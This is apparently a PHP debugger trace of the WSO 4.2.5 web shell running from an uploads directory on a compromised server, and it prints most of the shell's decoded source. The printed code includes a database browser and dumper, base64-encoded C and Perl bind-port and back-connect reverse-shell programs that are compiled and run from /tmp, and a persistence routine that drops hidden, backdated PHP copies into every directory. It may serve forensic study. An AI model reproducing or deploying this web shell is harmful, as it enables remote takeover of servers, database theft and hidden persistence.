fwrite($fp, $sql); else echo($sql);\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n $i = 0;\r\n $head = true;\r\n while($▟ = $this->fetch()) {\r\n $sql = \'\';\r\n if($i % 1000 == 0) {\r\n $head = true;\r\n $sql = ";\\n\\n";\r\n }\r\n $columns = array();\r\n foreach($▟ as $k=>$v) {\r\n if($v === null)\r\n $▟[$k] = "NULL";\r\n elseif(is_int($v))\r\n $▟[$k] = $v;\r\n else\r\n $▟[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n }\r\n if($head) {\r\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $▟).\')\';\r\n $head = false;\r\n } else\r\n $sql .= "\\n\\t,(".implode(", ", $▟).\')\';\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n $i++;\r\n }\r\n if(!$head)\r\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n break;\r\n case \'pgsql\':\r\n $this->query(\'SELECT * FROM \'.$table);\r\n while($▟ = $this->fetch()) {\r\n $columns = array();\r\n foreach($▟ as $k=>$v) {\r\n $▟[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n }\r\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $▟).\');\'."\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n }\r\n break;\r\n }\r\n return false;\r\n }\r\n };\r\n $db = new DbClass($_POST[\'type\']);\r\n if((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n switch($_POST[\'charset\']) {\r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n case "cp866": $db->setCharset(\'cp866\'); break;\r\n }\r\n if(empty($_POST[\'file\'])) {\r\n ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment; filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v);\r\n exit;\r\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v, $fp);\r\n fclose($fp);\r\n unset($_POST[\'p2\']);\r\n } else\r\n die(\'\');\r\n }\r\n hardHeader();\r\n echo "\r\n

Sql browser

\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n
TypeHostLoginPasswordDatabase
";\r\n $tmp = "";\r\n if(isset($_POST[\'sql_host\'])){\r\n if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n switch($_POST[\'charset\']) {\r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n case "cp866": $db->setCharset(\'cp866\'); break;\r\n }\r\n $db->listDbs();\r\n echo "\';\r\n }\r\n else echo $tmp;\r\n }else\r\n echo $tmp;\r\n echo " count the number of rows
\r\n ";\r\n if(isset($db) && $db->link){\r\n echo "
";\r\n if(!empty($_POST[\'sql_base\'])){\r\n $db->selectdb($_POST[\'sql_base\']);\r\n echo "";\r\n }\r\n echo "
Tables:

";\r\n $tbls_res = $db->listTables();\r\n while($▟ = $db->fetch($tbls_res)) {\r\n list($key, $value) = each($▟);\r\n if(!empty($_POST[\'sql_count\']))\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo " ".$value."" . (empty($_POST[\'sql_count\'])?\' \':" ({$n[\'n\']})") . "
";\r\n }\r\n echo "
File path:		";\r\n if(@$_POST[\'p1\'] == \'select\') {\r\n $_POST[\'p1\'] = \'query\';\r\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n $db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n $num = $db->fetch();\r\n $pages = ceil($num[\'n\'] / 30);\r\n echo "".$_POST[\'p2\']." ({$num[\'n\']} records) Page # ";\r\n echo " of $pages";\r\n if($_POST[\'p3\'] > 1)\r\n echo " < Prev";\r\n if($_POST[\'p3\'] < $pages)\r\n echo " Next >";\r\n $_POST[\'p3\']--;\r\n if($_POST[\'type\']==\'pgsql\')\r\n $_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else\r\n $_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "

";\r\n }\r\n if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n $db->query(@$_POST[\'p2\']);\r\n if($db->res !== false) {\r\n $title = false;\r\n echo \'\';\r\n $line = 1;\r\n while($▟ = $db->fetch()) {\r\n if(!$title) {\r\n echo \'\';\r\n foreach($▟ as $key => $value)\r\n echo \'\';\r\n reset($▟);\r\n $title=true;\r\n echo \'\';\r\n $line = 2;\r\n }\r\n echo \'\';\r\n $line = $line==1?2:1;\r\n foreach($▟ as $key => $value) {\r\n if($value == null)\r\n echo \'\';\r\n else\r\n echo \'\';\r\n }\r\n echo \'\';\r\n }\r\n echo \'
\'.$key.\'
null\'.nl2br(htmlspecialchars($value)).\'
\';\r\n } else {\r\n echo \'
Error: \'.htmlspecialchars($db->error()).\'
\';\r\n }\r\n }\r\n echo "

";\r\n echo "

";\r\n if($_POST[\'type\']==\'mysql\') {\r\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\r\n if($db->fetch())\r\n echo "
Load file
";\r\n }\r\n if(@$_POST[\'p1\'] == \'loadfile\') {\r\n $file = $db->loadFile($_POST[\'p2\']);\r\n echo \'
\'.htmlspecialchars($file[\'file\']).\'
\';\r\n }\r\n } else {\r\n echo htmlspecialchars($db->error());\r\n }\r\n echo \'
\';\r\n hardFooter();\r\n}\r\nfunction actionNetwork() {\r\n hardHeader();\r\n $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";\r\n $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";\r\n $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n echo "

Network tools

\r\n
\r\n Bind port to /bin/sh
\r\n Port: Password: Using: \r\n
\r\n
\r\n Back-connect to
\r\n Server: Port: Using: \r\n

";\r\n if(isset($_POST[\'p1\'])) {\r\n function cf($f,$t) {\r\n $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) {\r\n @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n }\r\n }\r\n if($_POST[\'p1\'] == \'bpc\') {\r\n cf("/tmp/bp.c",$bind_port_c);\r\n $▖ = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $▖ .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "
$▖".ex("ps aux | grep bp")."
";\r\n }\r\n if($_POST[\'p1\'] == \'bpp\') {\r\n cf("/tmp/bp.pl",$bind_port_p);\r\n $▖ = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "
$▖".ex("ps aux | grep bp.pl")."
";\r\n }\r\n if($_POST[\'p1\'] == \'bcc\') {\r\n cf("/tmp/bc.c",$back_connect_c);\r\n $▖ = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $▖ .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "
$▖".ex("ps aux | grep bc")."
";\r\n }\r\n if($_POST[\'p1\'] == \'bcp\') {\r\n cf("/tmp/bc.pl",$back_connect_p);\r\n $▖ = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "
$▖".ex("ps aux | grep bc.pl")."
";\r\n }\r\n }\r\n echo \'
\';\r\n hardFooter();\r\n}\r\nif( empty($_POST[\'a\']) )\r\n if(isset($▚) && function_exists(\'action\' . $▚))\r\n $_POST[\'a\'] = $▚;\r\n else\r\n $_POST[\'a\'] = \'FilesMan\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n call_user_func(\'action\' . $_POST[\'a\']);\r\n?>\r\n\r\n\r\n \';\r\n$d003=$_SERVER["DOCUMENT_ROOT"]."/..well-known";\r\nmkdir($d003);\r\nchmod($d003,0777);\r\nforeach ($dlR as $dir => $diR) {if ($diR->isDir()) {\r\n $Dir[] = $dir;\r\n $dIr=$diR."/.".basename($dir)."_".".p"."h"."p";\r\n touch($dir, strtotime(\'-30 days\', time()));\r\n $dlr = fopen($dIr, \'w\');\r\n fwrite($dlr, $Dlr);\r\n fclose($dlr);\r\n touch($dIr, strtotime(\'-30 days\', time())); \r\n \r\n}}$dlr1 = fopen($_SERVER["DOCUMENT_ROOT"]."/phpinfo.php", \'w\');\r\n fwrite($dlr1, $Dlr);\r\n fclose($dlr1);\r\n\r\n?>' /var/www/html/uploads/wso425.php(7) : eval()'d code 1 0 4 16 0 0.027267 1339752 array_key_exists 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 3 2 'watching' [] 4 16 1 0.027308 1339816 4 16 R FALSE 3 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 7 $▛ = 'c483695afceb816420a7702b0c66f877' 3 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 8 $▘ = TRUE 3 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 9 $▜ = 'UTF-8' 3 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 10 $▚ = 'FilesMan' 4 17 0 0.027377 1339752 md5 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 11 1 'python-requests/2.25.1' 4 17 1 0.027398 1339848 4 17 R 'ecd862b3d0595af0a0b03f511e800938' 3 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 11 $▙ = 'ecd862b3d0595af0a0b03f511e800938' 4 18 0 0.027428 1339816 md5 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 12 1 'localhost' 4 18 1 0.027443 1339912 4 18 R '421aa90e079fa326b6494f812ad13e79' 4 19 0 0.027461 1339816 md5 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 13 1 'localhost' 4 19 1 0.027475 1339912 4 19 R '421aa90e079fa326b6494f812ad13e79' 4 20 0 0.027489 1339880 prototype 1 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 13 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938' 4 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 359 _COOKIE['421aa90e079fa326b6494f812ad13e79key'] = 'ecd862b3d0595af0a0b03f511e800938' 5 21 0 0.027528 1340256 setcookie 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 360 2 '421aa90e079fa326b6494f812ad13e79key' 'ecd862b3d0595af0a0b03f511e800938' 5 21 1 0.027552 1340456 5 21 R TRUE 4 20 1 0.027566 1340392 3 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 16 _POST['charset'] = 'UTF-8' 4 22 0 0.027592 1340768 ini_set 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 25 2 'error_log' NULL 4 22 1 0.027609 1340840 4 22 R '' 4 23 0 0.027623 1340768 ini_set 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 26 2 'log_errors' 0 4 23 1 0.027638 1340840 4 23 R '1' 4 24 0 0.027651 1340768 ini_set 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 27 2 'max_execution_time' 0 4 24 1 0.027668 1340872 4 24 R '30' 4 25 0 0.027682 1340768 set_time_limit 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 28 1 0 4 25 1 0.027699 1340832 4 25 R FALSE 4 26 0 0.027712 1340800 define 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 31 2 'VERSION' '4.2.5' 4 26 1 0.027729 1340904 4 26 R TRUE 4 27 0 0.027742 1340832 get_magic_quotes_gpc 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 32 0 4 27 1 0.027756 1340832 4 27 R FALSE 4 28 0 0.027770 1340832 md5 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 43 1 'localhost' 4 28 1 0.027783 1340928 4 28 R '421aa90e079fa326b6494f812ad13e79' 4 29 0 0.027798 1340832 hardLogin 1 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 44 0 4 A /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 50 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler'] 5 30 0 0.027832 1340832 implode 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 51 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler'] 5 30 1 0.027854 1340976 5 30 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler' 5 31 0 0.027871 1340912 preg_match 0 /var/www/html/uploads/wso425.php(7) : eval()'d code(1) : eval()'d code 51 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1' 5 31 1 0.027891 1340976 5 31 R 0 0.027942 1261536 TRACE END [2023-02-13 01:36:26.265488]